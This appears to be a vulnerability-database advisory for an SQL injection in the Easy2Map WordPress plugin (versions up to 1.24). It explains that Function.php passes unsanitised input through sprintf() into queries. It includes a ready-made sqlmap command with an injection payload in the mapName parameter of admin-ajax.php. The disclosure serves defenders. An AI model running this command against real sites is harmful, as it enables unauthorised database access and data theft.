Lucene search

K
wpexploitLarry W. CashdollarWPEX-ID:49135A0C-34B4-4EE2-B2AD-E4F646619AC4
HistoryJun 08, 2015 - 12:00 a.m.

Easy2Map <= 1.24 - SQL Injection

2015-06-0800:00:00
Larry W. Cashdollar
6

The Function.php file uses sprintf() to format queries being sent to the database, this doesn’t provide proper sanitisation of user input or properly parameterises the query.

$ sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3
Related for WPEX-ID:49135A0C-34B4-4EE2-B2AD-E4F646619AC4